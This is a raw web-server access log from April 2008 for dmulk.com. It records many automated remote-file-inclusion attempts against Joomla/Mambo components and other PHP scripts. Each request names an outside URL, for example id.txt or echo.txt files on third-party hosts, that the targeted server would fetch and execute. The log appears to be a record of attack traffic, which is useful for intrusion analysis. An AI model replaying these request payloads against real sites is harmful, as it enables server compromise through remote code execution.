90.183.251.27 - - [17/Apr/2008:09:23:43 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:09:23:43 -0700] "GET /logs/index3.php?pagina=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:09:23:43 -0700] "GET /index3.php?pagina=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:23:43 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
72.30.216.107 - - [17/Apr/2008:09:24:50 -0700] "GET /logs/access.log HTTP/1.0" 200 25705 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:27:04 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:27:04 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:27:04 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:27:18 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:28:17 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:28:18 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:28:18 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:28:21 -0700] "GET /logs/access_080119.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:28:24 -0700] "GET /logs/access_080104.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:28:30 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:30:11 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:30:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:30:11 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:30:54 -0700] "GET /logs/access_080104.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:09:31:01 -0700] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:09:31:04 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.47.247.136 - - [17/Apr/2008:09:31:08 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:09:31:23 -0700] "GET /logs/errors.php?error=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
85.114.133.27 - - [17/Apr/2008:09:31:24 -0700] "GET /errors.php?error=http://www.insertcoinhere.de//cache/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET /logs/access_080324.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET /logs/access_080324.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:34 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:39 -0700] "GET /logs/access_080324.log/index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:39 -0700] "GET /index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:39 -0700] "GET /logs/index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:41 -0700] "GET /logs/access.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:41 -0700] "GET /logs/access.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.120.233.1 - - [17/Apr/2008:09:31:59 -0700] "GET /logs/access.log/index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.81.165 - - [17/Apr/2008:09:32:03 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [17/Apr/2008:09:32:03 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.191.81.165 - - [17/Apr/2008:09:32:04 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:33:01 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:33:03 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:33:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:33:40 -0700] "GET /logs/access_080119.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:34:03 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:34:06 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.60 - - [17/Apr/2008:09:34:07 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://onald.100webspace.net/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:34:39 -0700] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:34:39 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:34:40 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:35:17 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.203.196.46 - - [17/Apr/2008:09:35:53 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:35:55 -0700] "GET /logs/access_080218.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:13 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:14 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:14 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:18 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:19 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:36:19 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:37:12 -0700] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:37:12 -0700] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:37:16 -0700] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.191.81.165 - - [17/Apr/2008:09:38:18 -0700] "GET /logs/access_080226.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://dsvv.org/dsvv/user_file/iblees/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:38:23 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:38:34 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:38:39 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
82.146.46.2 - - [17/Apr/2008:09:38:51 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.46.2 - - [17/Apr/2008:09:38:51 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.46.2 - - [17/Apr/2008:09:38:51 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:38:54 -0700] "GET /logs/access_080119.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:09:39:34 -0700] "GET /logs/access_080120.log//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:09:39:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [17/Apr/2008:09:39:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:09:39:35 -0700] "GET /logs/access_080120.log//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:09:39:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [17/Apr/2008:09:39:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.48 - - [17/Apr/2008:09:39:38 -0700] "GET /logs/access_080120.log//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.48 - - [17/Apr/2008:09:39:38 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.48 - - [17/Apr/2008:09:39:39 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:45 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:47 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:48 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:49 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:52 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:39:53 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.80.160.214 - - [17/Apr/2008:09:39:57 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.80.160.214 - - [17/Apr/2008:09:39:57 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.80.160.214 - - [17/Apr/2008:09:39:58 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:40:05 -0700] "GET /logs/access_080308.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:40:05 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:40:06 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.194.149.65 - - [17/Apr/2008:09:40:07 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.centrogassystem.com/includes/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:40:13 -0700] "GET /logs/access_080324.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:40:13 -0700] "GET //index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.51.146 - - [17/Apr/2008:09:40:13 -0700] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.90.213.187 - - [17/Apr/2008:09:40:30 -0700] "GET /logs/access_080308.log//lang.php?subpage=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.90.213.187 - - [17/Apr/2008:09:40:30 -0700] "GET //lang.php?subpage=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.90.213.187 - - [17/Apr/2008:09:40:31 -0700] "GET /logs//lang.php?subpage=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:39 -0700] "GET /logs/access_071214.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:40 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
62.80.160.214 - - [17/Apr/2008:09:40:40 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:41 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:47 -0700] "GET /logs/access_080125.log/gallery/displayCategory.php?basepath=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:47 -0700] "GET /gallery/displayCategory.php?basepath=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:40:48 -0700] "GET /logs/gallery/displayCategory.php?basepath=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
89.218.85.18 - - [17/Apr/2008:09:41:17 -0700] "GET //skin/zero_vote/error.php?dir=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
209.67.218.74 - - [17/Apr/2008:09:41:22 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
209.67.218.74 - - [17/Apr/2008:09:41:22 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
